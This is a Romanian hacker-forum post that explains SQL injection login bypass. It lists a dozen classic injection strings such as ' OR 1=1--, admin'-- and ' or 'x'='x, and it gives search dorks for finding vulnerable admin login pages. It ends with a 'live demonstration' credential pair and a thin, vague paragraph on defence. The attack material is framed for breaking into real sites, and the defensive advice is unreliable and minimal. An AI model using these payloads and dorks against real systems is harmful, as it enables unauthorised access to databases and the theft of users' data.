hackeri
Cultul Hackerilor
|
Lista Forumurilor Pe Tematici
|
hackeri | Reguli | Inregistrare | Login
POZE HACKERI
Nu sunteti logat.
|
Nou pe simpatie:
Profil bella_sexy
 | Femeie
25 ani
Bucuresti
cauta Barbat
27 - 48 ani |
|
adi2088
Super Moderator
 Din: Bistrita
Inregistrat: acum 18 ani
Postari: 12
|
|
::::Metoda explicata cu LIVE demonstration::::
SQL Injection este metoda care exploateaza erorile din codul aplicatiilor si permite atacatorului sa injecteze comenzi SQL in formele de login feedback forms,cu scopul obtinerii accesului la informatiile din baza de date.SQL Injection functioneaza deoarece formele de imput permit expresii SQL sa patrunda direct in baza de date.
Construind programme cu SQL pentru a manipula comenzile din baza si in acest fel capatand acces.
Cea mai folosita este SQL login bypass ,injectand in sectia de login si password.
Code:
Exemplu : ‘ OR 1=1—
Schema URL: ‘ OR 1=1—
Alte comenzi : admin’—
‘ OR 0=0—
“ OR=0—
OR 0=0—
‘ HI OR 1=1—
" or 0=0 #
or 0=0 #
' or 'x'='x
" or "x"="x
Cautam astfel de siteuri cu urmatoarele dorkuri :
”adminlogin.asp”
”login.asp”
Cum sa te aperi de astfel de atacuri.
Sistemul trebuie evaluat pentru orice fel de vulnerabilitate ,codurile trebuie sa fie bug free ,si aplicatiile si tot ce face parte din infrastructura bine satinizate.
La fiecare schimbare a componentelor trebuie facut un web security audit.
Nu are rost sa intru in detalii si in plus nu cunosc indeajuns de mult baza SQL,insa daca nu aveti o infrastructura complexa de care sa aveti grija nici nu se merita sa va complicati.
LIVE demonstration
Username: ' or '='
Password: ' or '='
_______________________________________
only god can judge me
|
|
| pus acum 18 ani |
|